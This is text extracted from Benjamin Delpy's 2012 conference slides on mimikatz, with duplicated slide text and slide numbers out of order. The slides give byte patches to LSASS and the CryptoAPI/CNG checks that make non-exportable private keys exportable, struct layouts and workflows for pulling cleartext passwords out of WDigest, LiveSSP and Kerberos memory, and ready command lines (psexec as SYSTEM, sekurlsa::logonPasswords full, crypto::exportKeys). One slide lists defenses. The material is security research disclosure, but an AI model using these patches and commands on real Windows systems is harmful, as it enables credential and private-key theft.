07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapi demo time
mimikatz crypto patchcapi demo time
Import export import as not exportablehellip export
Import export import as not exportablehellip export
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44 44
mimikatz crypto patchcapi limitations
mimikatz crypto patchcapi limitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45 45
mimikatz crypto cng how it works
mimikatz crypto cng how it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46 46
mimikatz crypto cng how itrsquos exported ( level)
mimikatz crypto cng how itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEM SYSTEM_MANDATORY_LABEL_NO_WRITE_UP SYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48 48
mimikatz cryptoexportKeys [user] Cleacutes CNG - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcng demo time
mimikatz crypto patchcng demo time
Import export import as not exportablehellip export again
Import export import as not exportablehellip export again
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50 50
mimikatz crypto patchcng limitations
mimikatz crypto patchcng limitations
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51 51
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz crypto memo
mimikatz crypto memo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53 53
mimikatz crypto what we can do
mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz sekurlsa wdigest what is it
mimikatz sekurlsa wdigest what is it
ldquoDigest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a users web browser It applies a hash function to a password before sending it over the network [hellip]rdquo Wikipedia httpenwikipediaorgwikiDigest_access_authentication
ldquoCommon Digest Authentication Scenarios ndash Authenticated client access to a Web site ndash Authenticated client access using SASL ndash Authenticated client access with integrity protection to a directory service
using LDAPrdquo Microsoft httptechnetmicrosoftcomlibrarycc778868aspx
Again it seems cool ndash No password over the network just hashes ndash No reversible password in Active Directory hashes for each realm
bull Only with Advanced Digest authentication
ldquoDigest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a users web browser It applies a hash function to a password before sending it over the network [hellip]rdquo Wikipedia httpenwikipediaorgwikiDigest_access_authentication
ldquoCommon Digest Authentication Scenarios ndash Authenticated client access to a Web site ndash Authenticated client access using SASL ndash Authenticated client access with integrity protection to a directory service
using LDAPrdquo Microsoft httptechnetmicrosoftcomlibrarycc778868aspx
Again it seems cool ndash No password over the network just hashes ndash No reversible password in Active Directory hashes for each realm
bull Only with Advanced Digest authentication
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 17 17
mimikatz sekurlsa wdigest what is it
mimikatz sekurlsa wdigest what is it
We speak about hashes but what hashes H = MD5(HA1nonce[hellip]HA2)
bull HA1 = MD5(usernamerealmpassword)
bull HA2 = MD5(methoddigestURI[hellip])
Even after login HA1 may changehellip realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers ndash Username
ndash Realm (from server)
ndash Password
We speak about hashes but what hashes H = MD5(HA1nonce[hellip]HA2)
bull HA1 = MD5(usernamerealmpassword)
bull HA2 = MD5(methoddigestURI[hellip])
Even after login HA1 may changehellip realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers ndash Username
ndash Realm (from server)
ndash Password
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 18 18
mimikatz sekurlsa wdigest theory
mimikatz sekurlsa wdigest theory
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digest ndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemory ndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemory ndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in args
bull Protect it with LsaProtectMemory bull Update or insert data in double linked list wdigestl_LogSessList
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digest ndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemory ndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemory ndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in args
bull Protect it with LsaProtectMemory bull Update or insert data in double linked list wdigestl_LogSessList
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 19 19
text7409D151 _DigestCalcHA18 call dword ptr [eax+0B4h]
text74096C69 _SpAcceptCredentials16 call dword ptr [eax+0B0h]
mimikatz sekurlsa wdigest workflow
mimikatz sekurlsa wdigest workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 20 20
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
typedef struct _KIWI_WDIGEST_LIST_ENTRY struct _KIWI_WDIGEST_LIST_ENTRY Flink struct _KIWI_WDIGEST_LIST_ENTRY Blink DWORD UsageCount struct _KIWI_WDIGEST_LIST_ENTRY This LUID LocallyUniqueIdentifier [hellip] LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password [hellip]
KIWI_WDIGEST_LIST_ENTRY PKIWI_WDIGEST_LIST_ENTRY
wdigestl_LogSessList
search linked list for LUID
KIWI_WDIGEST_LKIWI_WDIGEST_LIST_ENTRY
password in clear
mimikatz sekurlsa wdigest demo time
mimikatz sekurlsa wdigest demo time
sekurlsawdigest
sekurlsawdigest
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 21 21
mimikatz sekurlsa livessp mimikatz sekurlsa livessp
because Microsoft was too good in closed networks
because Microsoft was too good in closed networks
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 22 22
mimikatz sekurlsa livessp how
mimikatz sekurlsa livessp how
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 23 23
0 kdgt process 0 0 lsassexe PROCESS 83569040 SessionId 0 Cid 0224 Peb 7f43f000 ParentCid 01b4 DirBase 5df58100 ObjectTable 80ce4740 HandleCount ltData Not Accessiblegt Image lsassexe 0 kdgt process i 83569040 You need to continue execution (press g ltentergt) for the context to be switched When the debugger breaks in again you will be in the new process context 0 kdgt g Break instruction exception - code 80000003 (first chance) ntRtlpBreakWithStatusInstruction 814b39d0 cc int 3 0 kdgt reload user Loading User Symbols 0 kdgt bp p $proc lsasrvLsaProtectMemory kc 5 g 0 kdgt g
mimikatz sekurlsa livessp how
mimikatz sekurlsa livessp how
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 24 24
lsasrvLsaProtectMemory livesspLiveMakeSupplementalCred livesspLiveMakeSecPkgCredentials livesspLsaApLogonUserEx2 livesspSpiLogonUserEx2 lsasrvLsaProtectMemory msv1_0NlpAddPrimaryCredential msv1_0SspAcceptCredentials msv1_0SpAcceptCredentials lsasrvLsaProtectMemory tspkgTSHidePassword tspkgSpAcceptCredentials
1 kdgt uf c livesspLsaApLogonUserEx2 livesspLsaApLogonUserEx2 (74781536) [] livesspLsaApLogonUserEx2+0x560 (74781a96) call to livesspLiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah Pass the Hash capability with Live account toohellip
Live user can logon through RDP via SSO
mimikatz sekurlsa livessp workflow
mimikatz sekurlsa livessp workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 25 25
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_LIVESSP_LIST_ENTRY struct _KIWI_LIVESSP_LIST_ENTRY Flink struct _KIWI_LIVESSP_LIST_ENTRY Blink PVOID unk0 PVOID unk1 PVOID unk2 PVOID unk3 DWORD unk4 DWORD unk5 PVOID unk6 LUID LocallyUniqueIdentifier LSA_UNICODE_STRING UserName PVOID unk7 PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds
KIWI_LIVESSP_LIST_ENTRY PKIWI_LIVESSP_LIST_ENTRY
livesspLiveGlobalLogonSessionList
search linked list for LUID
KIWI_LIVESSP_LISKIWI_LIVESSP_LIST_ENTRY KIWI_LIVESSP_PRIKIWI_LIVESSP_PRIMARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL DWORD isSupp DWORD unk0 LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password
KIWI_LIVESSP_PRIMARY_CREDENTIAL PKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa mimikatz sekurlsa
Even if we already have tools for normal accounts are you not curious to test one with this trap
Even if we already have tools for normal accounts are you not curious to test one with this trap
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 26 26
Me yes
mimikatz sekurlsa kerberos mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27 27
lsasrvLsaProtectMemory kerberosKerbHideKey kerberosKerbCreatePrimaryCredentials kerberosKerbCreateLogonSession kerberosSpAcceptCredentials lsasrvLsaProtectMemory kerberosKerbHidePassword kerberosKerbCreateLogonSession kerberosSpAcceptCredentials lsasrvLsaProtectMemory msv1_0NlpAddPrimaryCredential msv1_0SspAcceptCredentials msv1_0SpAcceptCredentials lsasrvLsaProtectMemory wdigestSpAcceptCredentials lsasrvLsaProtectMemory tspkgTSHidePassword tspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6) workflow
mimikatz sekurlsa kerberos (nt6) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PR
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL DWORD unk0 PVOID unk1 PVOID unk2 PVOID unk3 ifdef _M_X64 BYTE unk4[32] elif defined _M_IX86 BYTE unk4[20] endif LUID LocallyUniqueIdentifier ifdef _M_X64 BYTE unk5[44] elif defined _M_IX86 BYTE unk5[36] endif LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PR
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5) workflow
mimikatz sekurlsa kerberos (nt5) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flink struct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCount PVOID unk0 PVOID unk1 PVOID unk2 DWORD unk3 DWORD unk4 PVOID unk5 PVOID unk6 PVOID unk7 LUID LocallyUniqueIdentifier
ifdef _M_IX86 DWORD unk8
endif DWORD unk9 DWORD unk10 PVOID unk11 DWORD unk12 DWORD unk13 PVOID unk14 PVOID unk15 PVOID unk16 [hellip] LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa demo time
mimikatz sekurlsa demo time
Final sekurlsa demo sekurlsalogonPasswords full
Final sekurlsa demo sekurlsalogonPasswords full
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30 30
mimikatz sekurlsa kerberos ldquohu rdquo
mimikatz sekurlsa kerberos ldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31 31
mimikatz sekurlsa mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32 32
LsaUnprotectMemory
mimikatz sekurlsa LsaEncryptMemory NT5
mimikatz sekurlsa LsaEncryptMemory NT5
